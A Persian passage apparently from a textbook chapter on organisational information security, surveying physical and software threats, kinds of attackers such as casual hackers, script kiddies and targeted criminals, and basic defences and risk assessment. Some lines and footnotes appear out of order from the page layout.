‫ﺗﻬﺪﻳــﺪﺍﺕ ﻛﻠــﻲ ﻣﺘﻤﺮﻛــﺰ ﺷــﻮﻳﻢ‪ .‬ﻫﻨﮕﺎﻣﻴﻜــﻪ ﺍﻳــﻦ ﺗﻬﺪﻳــﺪﺍﺕ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺷﺪﻧﺪ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲ ﺳﻄﺢ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠـﻲ ﻭ ﺧـﺎﺭﺟﻲ ﺩﺭ‬
‫ﻓﻌﺎﻟﻴـﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﺗﻬﺪﻳﺪﻫﺎ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺧﻮﺍﻫﺪ‬
‫ﺑﻮﺩ‪.‬‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﻛﻠﻲ ﻫﺮ ﺷﺮﻛﺖ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﺭﺳﻤﻲ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﻓﻴﺰﻳﻜﻲ‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ )ﺁﺗﺶﺳﻮﺯﻱ‪ ،‬ﺯﻟﺰﻟﻪ‪ ،‬ﻃﻮﻓﺎﻧﻬﺎﻱ ﺷﺪﻳﺪ ﻭ ﺳﻴﻞ(؛‬
‫ﺩﺯﺩﻱ؛‬
‫ﺗﺨﺮﻳﺐ؛‬
‫ﺗﺪﺍﺧﻠﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ؛‬
‫ﺗﺨﺮﻳﺐ ﺷﺒﻜﻪ؛ ﻭ‬
‫ﺟﺎﺳﻮﺳﻲ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ‪.‬‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﻧﻔﻮﺫ ﺑﻪ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ؛‬
‫ﺑﺮﺍﻓﺰﺍﺭﻫﺎ )ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﺗﺮﺍﻭﺍﻫﺎ‪ ،‬ﻛﺮﻣﻬﺎ(؛‬
‫ﺍﻧﺘﺸﺎﺭ ﻏﻴﺮﻣﺠﺎﺯ ﻳﺎ ﺗﺨﺮﻳﺐ ﺩﺍﺩﻩﻫﺎ؛ ﻭ‬
‫ﺟﺎﺳﻮﺳﻲ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﺑﻮﺳﻴﻠﺔ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ‪.‬‬
‫ﺍﺯ ﻣﻮﺿﻊ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻧﺴﺎﻧﻲ‪ ،‬ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﻋﻮﺍﻣﻞ ﺧﺮﺍﺑﻜﺎﺭ ﺩﺍﺧﻠـﻲ‬
‫ﻭ ﺧﺎﺭﺟﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﻘﺾ ﺍﻣﻨﻴﺖ ﺩﺍﺧﻠﻲ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻧﺎﺷﻲ ﺍﺯ ﺧﻄﺎﻱ ﺍﻧﺴﺎﻧﻲ ﺑﺎﺷﺪ‪ :‬ﻳﻚ ﺳﻬﻞﺍﻧﮕﺎﺭﻱ ﺳﺎﺩﻩ‪،‬‬
‫ﺑﻲﺗﻮﺟﻬﻲ‪ ،‬ﻳﺎ ﻋﺪﻡ ﺁﻣﻮﺯﺵ ﻛﺎﻓﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ‪ .‬ﺩﺭ ﺣﻮﺯﻩﻫﺎﻱ ﺩﻳﮕﺮ‬
‫ﺑﺨــﺼﻮﺹ ﺟﺎﺳﻮﺳــﻲ ﺳــﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ‪ ،‬ﻣــﻲﺗــﻮﺍﻥ ﺍﺯ ﻣﻬﻨﺪﺳــﻲ‬
‫ﺍﺟﺘﻤﺎﻋﻲ‪ ٥٦‬ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺗﺴﻬﻴﻼﺕ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﻭ‬
‫ﻣﺤﺮﻣﺎﻧﺔ ﺍﻓﺮﺍﺩ ﺁﮔﺎﻩ ﺩﺍﺧﻞ ﺷﺮﻛﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩ‪ .‬ﻣﺠﻤﻮﻋـﻪﺍﻱ‬
‫ﻣﻨﺎﺳﺐ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﺑﺨـﺶ ﺍﻣﻨﻴـﺖ ﻭ ﺑـﺎ ﻫﻤﻜـﺎﺭﻱ‬
‫ﺑﺨﺶ ﭘﺮﺳﻨﻠﻲ ﺍﻳﺠﺎﺩ ﺷﻮﻧﺪ ﺗﺎ ﺑﻪ ﻛﺎﻫﺶ ﺧﻄﺮﺍﺕ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺑﺨﺸﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﭘﺮﺳﻨﻠﻲ ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺭﻭﺍﻟﻬـﺎﻱ‬
‫ﺍﺳﺘﺨﺪﺍﻡ ﻭ ﺍﺧﺮﺍﺝ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻫﻤﻜﺎﺭﻱ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﮔﺮﭼـﻪ‬
‫ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﻤﻲﺗﻮﺍﻥ ﺍﻧﮕﻴﺰﺓ ﺷﻔﺎﻓﻲ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ‬
‫ﻳﺎﻓﺖ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺍﻳﻨﮕﻮﻧﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺨـﺮﺏ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﻧﻴﺎﺯ ﺑﻪ ﺗﻮﺿﻴﺢ ﻣﻔﺼﻞ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺳﺘﻪﺑﻨﺪﻱ ﻛﺴﺎﻧﻴﻜﻪ ﺑﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎ‬
‫ﻧﻔﻮﺫ ﻣﻲﻛﻨﻨﺪ ﭼﻨﺪﺍﻥ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ ﻧﻴـﺴﺖ‪ ،‬ﻭﻟـﻲ ﺑـﻪ ﻫـﺮ ﺗﺮﺗﻴـﺐ‬
‫ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻣﻮﺭﺩ ﺷﺪﺕ ﺗﻬﺪﻳﺪﻫﺎ ﻭ ﻣﺘﻨﺎﻇﺮﹰﺍ ﺁﺳﻴﺐ ﻣﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ‬
‫ﻫﺮ ﺗﻬﺪﻳﺪ ﺑﺼﻮﺭﺕ ﻛﻠﻲ ﺑﺤﺚ ﻛﺮﺩ‪.‬‬
‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨﻲ‪) ٥٧‬ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﺎﺑﺴﺘﺎﻧﻲ‪ ،(٥٨‬ﻛﺎﺭﻣﻨﺪﺍﻥ ﻳﻚ‬
‫ﺳﺎﺯﻣﺎﻥ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺷـﺒﻜﻪ ﺁﺷـﻨﺎﻳﻲ ﺩﺍﺭﻧـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻻ ﻗـﺼﺪ ﺗﺨﺮﻳـﺐ ﺩﺍﺩﻩﻫـﺎ ﻭ ﺩﺍﺭﺍﺋﻴﻬـﺎﻱ ﺷـﺮﻛﺖ ﺭﺍ‬
‫ﺍﻓﺮﺍﺩ ﻣﻌﻤـﻮ ﹰ‬
‫ﻧﺪﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﺍﺯ ﺭﻭﻱ ﻛﻨﺠﻜﺎﻭﻱ ﺳﻌﻲ ﻣﻲﻛﻨﻨـﺪ ﺑـﻪ ﻣﻨـﺎﺑﻌﻲ ﻛـﻪ‬
‫ﻣﺠﺎﺯ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻧﻴﺴﺘﻨﺪ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﻨﺪ‪ .‬ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ‬
‫ﻼ ﺑﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﻔﻮﺫ ﺁﺷﻨﺎ ﻧﺒﺎﺷﻨﺪ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺩﺭﺳـﺖ‬
‫ﺷﺎﻳﺪ ﻛﺎﻣ ﹰ‬
‫ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎ ﺑﺎﻋﺚ ﺗﺨﺮﻳﺐ ﺳﻴﺴﺘﻤﻬﺎ ﺷﻮﻧﺪ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﺍﮔـﺮ‬
‫ﺍﺑﺰﺍﺭﻫﺎ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ‪ download‬ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺭﺍﻱ‬
‫ﺩﺭﺏ ﻣﺨﻔــﻲ‪ ٥٩‬ﻳــﺎ ﺗــﺮﺍﻭﺍ‪ ٦٠‬ﺑﺎﺷــﻨﺪ ﻛــﻪ ﻣــﻮﺭﺩ ﺍﺳــﺘﻔﺎﺩﻩ ﺩﻳﮕــﺮ‬
‫ﻣﻬﺎﺟﻤﻴﻦ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﻟﺬﺍ ﻧﻔﻮﺫ ﺗﻔﻨﻨـﻲ ﻳـﻚ ﺗﻬﺪﻳـﺪ ﺑـﺰﺭﮒ‬
‫‪Social Engineering‬‬
‫‪Casual Hackers‬‬
‫‪Summertime Hackers‬‬
‫‪Backdoor‬‬
‫‪Trojan‬‬
‫‪56‬‬
‫‪57‬‬
‫‪58‬‬
‫‪59‬‬
‫‪60‬‬
‫‪١٣٩‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ ﻭ ﻣﻬﻤﺘﺮﻳﻦ ﺩﻟﻴﻞ ﻣﻤﻨﻮﻉ ﺑﻮﺩﻥ ﺁﻥ ﻧﻴﺰ ﻫﻤﻴﻦ‬
‫ﺍﺳﺖ‪.‬‬
‫ﺩﺍﺭﺩ‪ .‬ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑﻪ ﻋﻠﺖ ﺳﻄﺢ ﺩﺳﺘﺮﺳﻲﺷﺎﻥ ﺩﺭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ‪،‬‬
‫ﺍﺯ ﻟﺤﺎﻅ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﻧﮕﺮﺍﻧﻲ ﺟﺪﻱ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﻻ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺟـﻮﺍﻧﺘﺮ )ﺩﺭ ﺳـﻦ‬
‫"‪"Script Kiddie‬ﻫـﺎ ﻣﻌﻤـﻮ ﹰ‬
‫ﺩﺭ ﺩﺳﺘﺔ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨﻲ‪ ،‬ﺑﺮﺧﻲ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ﺑﻪ ﻋﻠﺖ ﺧـﺴﺘﮕﻲ‬
‫ﺍﺯ ﻛﺎﺭ ﻳﺎ ﺟﺬﺍﺑﻴﺘﻬﺎﻱ ﺭﻗﺎﺑﺖ ﻓﻨﻲ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻧﻔـﻮﺫ ﻣـﻲﻛﻨﻨـﺪ‪.‬‬
‫ﮔﺮﻭﻫﻲ ﺩﻳﮕﺮ ﺑﺪﻧﺒﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺗﺮﻓﻴـﻊ ﻭ ﺩﺳـﺘﻤﺰﺩ‬
‫ﻫﻤﻜﺎﺭﺍﻥ ﻳﺎ ﺩﺍﺩﻩﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﻫـﺴﺘﻨﺪ‪ .‬ﺑﻌـﻀﻲ ﺩﻳﮕـﺮ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻗﺪﺍﻣﺎﺕ ﺗﻼﻓﻲ ﺟﻮﻳﺎﻧﻪ ﻋﻠﻴﻪ ﺳﺎﺯﻣﺎﻥ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻋﻤﻞ ﺩﺳﺖ ﺑﺰﻧﻨﺪ؛ ﻳﺎ ﺑﺎﻋﺚ ﺗﻬﺪﻳـﺪﺍﺕ ﻧﺎﺧﻮﺍﺳـﺘﻪﺍﻱ ﺷـﻮﻧﺪ ﻛـﻪ‬
‫ﻋﻠﺖ ﺁﻥ ﻋﺪﻡ ﺣﻔﺎﻇﺖ ﺻﺤﻴﺢ ﺍﺯ ﺳﻴﺴﺘﻢ ﺑﻪ ﻋﻠﺖ ﺁﻣﻮﺯﺵ ﻓﻨﻲ‬
‫ﻧﺎﻗﺺ ﻳﺎ ﺑﻲﺩﻗﺘﻲ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎﺷﺪ‪.‬‬
‫ﻻ ﻣﻬﺎﺟﻤﺎﻥ ﺧﺒـﺮﻩﺍﻱ ﻫـﺴﺘﻨﺪ ﻛـﻪ‬
‫ﺗﺒﻬﻜﺎﺭﺍﻥ ﻫﺪﻓﺪﺍﺭ ﻣﻌﻤﻮ ﹰ‬
‫ﻫﺪﻑ ﺁﻧﻬﺎ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺗﺨﺮﻳﺐ ﻭ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩﻥ ﺩﺍﺩﻩﻫـﺎ‪ ،‬ﻭ‬
‫ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﺧﻼﻝ ﻳﻚ ﺑﺎﺯﺓ ﺯﻣـﺎﻧﻲ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺑﺮﺧﻼﻑ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨﻲ ﻭ "‪"script kiddie‬ﻫﺎ‪ ،‬ﻫـﺪﻑ ﺁﻧﻬـﺎ‬
‫ﻭﺍﻗﻌﹰﺎ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎ ﺍﺳـﺖ‪ .‬ﺁﻧﻬـﺎ ﺩﺭ ﺑﺮﺧـﻲ ﻣـﻮﺍﺭﺩ ﺑـﺪﻧﺒﺎﻝ‬
‫ﺍﻃﻼﻋﺎﺕ ﺍﺭﺯﺷﻤﻨﺪﻱ ﻣﺜـﻞ ﺩﺍﺩﻩﻫـﺎﻱ ﻣـﺎﻟﻲ )ﺷـﻤﺎﺭﻩﻫـﺎﻱ ﻛـﺎﺭﺕ‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﺟﺰﺋﻴﺎﺕ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ( ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ )ﺷـﻤﺎﺭﻩﻫـﺎﻱ‬
‫ﺷﻨﺎﺳﺎﻳﻲ‪ ،‬ﺳﻮﺍﺑﻖ ﺩﺍﻧﺸﮕﺎﻫﻲ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﻣـﺸﺘﺮﻳﺎﻥ( ﻫـﺴﺘﻨﺪ ﺗـﺎ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ ﻳﺎ ﺑﮕﻮﻧﻪﺍﻱ ﺩﻳﮕﺮ ﺍﺯ ﺁﻧﻬﺎ ﺑﻬﺮﻩ ﺑﺒﺮﻧﺪ‪ .‬ﺍﻳـﻦ ﺩﺳـﺘﻪ ﺍﺯ‬
‫ﻣﻬﺎﺟﻤﺎﻥ ﻏﺎﻟﺒﹰﺎ ﺑﺨﻮﺑﻲ ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﻣﻲﺷﻮﻧﺪ ﻭ ﭘـﻴﺶ ﺍﺯ ﺍﻧﺠـﺎﻡ‬
‫ﺣﻤﻠﺔ ﺍﺻﻠﻲ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺭﺍﺟـﻊ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﻗﺮﺑـﺎﻧﻲ‬
‫ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺗﻌﺪﺍﺩ ﺍﻳﻦ ﻧﻮﻉ ﻣﺠﺮﻣﺎﻥ ﻛﻤﺘـﺮ‬
‫ﺍﺯ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻧﻔﻮﺫ ﺁﻧـﺎﻥ ﺑـﺴﻴﺎﺭ ﻣـﺸﻜﻞ‬
‫ﻣﻲﺑﺎﺷﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﻧﻔﻮﺫ ﻣﻮﻓﻘﻴﺖﺁﻣﻴـﺰ‪ ،‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺎﻋـﺚ‬
‫ﺗﺨﺮﻳﺒﻬﺎﻱ ﺟﺪﻱ ﺷﻮﻧﺪ‪.‬‬
‫ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﻣﺸﺎﻭﺭﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﻋﻤﺪﻱ ﻭ ﻳـﺎ ﺳـﻬﻮﻱ‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﺟﺪﻱ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺍﻳﺠﺎﺩ ﻛﻨﻨـﺪ ﻭ ﺍﻳـﻦ ﺑـﺴﺘﮕﻲ ﺑـﻪ‬
‫ﻣﺎﻫﻴﺖ ﺭﻭﺍﺑﻂ ﺁﻧﻬﺎ ﺑﺎ ﻣـﺪﻳﺮﺍﻥ ﻭ ﻫﻤﻜﺎﺭﺍﻧـﺸﺎﻥ ﺩﺭ ﻣﺤـﻴﻂ ﻛـﺎﺭ‬
‫)‪Intrusion Detection Systems (IDSs‬‬
‫‪61‬‬
‫ﻫﺮﻳــﻚ ﺍﺯ ﺍﻳــﻦ ﺗﻬﺪﻳــﺪﺍﺕ ﺑــﺎﻟﻘﻮﺓ ﺍﻧــﺴﺎﻧﻲ ﺑــﺮﺍﻱ ﺳﻴــﺴﺘﻤﻬﺎ ﻭ‬
‫ﺍﻃﻼﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺳﻄﺢ ﻣﺘﻔﺎﻭﺗﻲ ﺍﺯ ﻣﺨﺎﻃﺮﻩ ﺭﺍ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧﺪ ﻭ‬
‫ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﻧﻴـﺎﺯ ﺍﺳـﺖ‪.‬‬
‫ﺶ ﺑﻪﺭﻭﺯ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗ ﹺ‬
‫ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨـﻲ ﻳـﺎ "‪"script kiddie‬ﻫـﺎ‬
‫ﻛﻔﺎﻳﺖ ﻛﻨﻨﺪ‪ .‬ﺍﻣـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﻫﺪﻓـﺪﺍﺭ‪ ،‬ﺍﻳـﻦ ﺭﺍﻫﺒـﺮﺍﻥ‬
‫ﻫﻮﺷﻴﺎﺭ ﺳﻴﺴﺘﻢ ﻭ ﻣﺪﻳﺮﺍﻥ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ‬
‫ﻣﺘﻮﻗﻒ ﺳﺎﺯﻧﺪ؛ ﻭ ﺩﺭ ﺍﻳﻦ ﺭﺍﺳﺘﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻭ‬
‫ﺗﻮﺟﻪ ﻣﺪﻳﺮﻳﺖ ﺑﻪ ﺧﻨﺜﻲﺳﺎﺯﻱ ﺣﻤﻼﺕ ﺍﺣﺘﻤﺎﻟﻲ ﺩﺭﻭﻥﺳـﺎﺯﻣﺎﻧﻲ‬
‫ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺍﻣﺎ ﻫﻴﭻ ﻃﺮﺣﻲ ﺑﺪﻭﻥ ﻧﻘﺺ ﻧﻴـﺴﺖ ﻭ ﺑـﺴﻴﺎﺭ‬
‫ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﻛﻪ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﺳﺎﺑﻘﻪ ﻭ ﺭﻭﻧﺪ ﺍﻳﻦ ﻃﺮﺣﻬﺎ ﺭﺍ ﺑﺎ ﺗﻮﺟـﻪ‬
‫ﺑﻪ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺴﺘﻤﺮﹰﺍ ﺑﺮﺭﺳﻲ ﻛﻨـﺪ‪ .‬ﻧﻈـﺎﺭﺕ ﻣـﺴﺘﻤﺮ ﺑـﺮ‬
‫ﺩﻭﺭﻧﻤــﺎﻱ ﺍﻣﻨﻴﺘــﻲ‪ ،‬ﻛــﺸﻒ ﻭ ﺟﻠــﻮﮔﻴﺮﻱ ﺍﺯ ﻧﻔــﻮﺫ ﺭﺍ ﺳــﺎﺩﻩﺗــﺮ‬
‫ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ‪ ،‬ﺍﺗﺨﺎﺫ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺷﻔﺎﻑ ﺩﺭﺑـﺎﺭﺓ ﺁﻧﭽـﻪ‬
‫ﻛﻪ ﺑﺎﻳﺪ ﺣﻴﻦ ﻭ ﺑﻌﺪ ﺍﺯ ﻭﻗﻮﻉ ﺣﻤﻠﻪ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ﺑﻪ ﻛﺎﻫﺶ ﺁﺳﻴﺐ‬
‫ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻓـﺮﺍﺩ ﻣـﺴﺌﻮﻝ ﺭﺍ ﺑـﺮﺍﻱ ﺭﺳـﻴﺪﮔﻲ ﺑـﻪ ﺧﺮﺍﺑـﻲ‬
‫ﺭﺍﻫﻨﻤﺎﻳﻲ ﻣﻲﻧﻤﺎﻳﺪ ﻭ ﺍﻣﻜﺎﻥ ﺛﺒﺖ ﻣﻨﺎﺳﺐ ﮔﺰﺍﺭﺷﺎﺕ ﻻﺯﻡ ﺑـﺮﺍﻱ‬
‫ﻣﻘﺎﻣﺎﺕ ﺩﺍﺧﻞ ﻭ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﺩ‪.‬‬
‫ﺗﺨﻤﻴﻦ ﻋﻤﻠﻲ ﺍﻣﻨﻴﺖ‪:‬‬
‫ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ‬
‫ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﺗﺨﻠﻔﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺭﻳﺸﻪ ﺩﺭ ﺣﻤﻼﺕ‬
‫ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ ﺩﺍﺭﻧﺪ ﻭ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ‬
‫ﺩﺍﺩﻩﻫﺎ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻭ ﻏﻴﺮﺍﺧﻼﻗﻲ ﻣﻨﺘﻬﻲ ﻣﻲﺷـﻮﻧﺪ‪.‬‬
‫ﮔﺎﻣﻬﺎﻱ ﺍﺑﺘﺪﺍﻳﻲ ﺍﻳﺠﺎﺩ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺯﻣﺎﻧﻲ ﺑﺮﺩﺍﺷﺘﻪ ﻣﻲﺷـﻮﺩ‬
‫ﻛﻪ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﻳﻚ ﺗﺨﻤﻴﻦ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻣﻮﺭﺩ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﺩﺍﺧﻠـﻲ‪،‬‬
‫ﺍﻫﺪﺍﻑ‪ ،‬ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳـﻦ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺩﺑﻴﺮﺳﺘﺎﻥ ﻳﺎ ﭘﻴﺶﺩﺍﻧﺸﮕﺎﻫﻲ( ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻬﺎﺭﺗﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧـﻮﺏ‬
‫ﻭ ﺍﻭﻗﺎﺕ ﺑﻴﻜﺎﺭﻱ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﭼﻨﺪﺍﻥ ﺧﺒﺮﻩ ﻧﻴﺴﺘﻨﺪ ﻭ ﺑـﺮﺍﻱ‬
‫ﺍﻧﺠﺎﻡ ﻧﻔﻮﺫ ﺍﺯ ﺗﻜﻪﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺩﻳﮕﺮﺍﻥ ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ‬
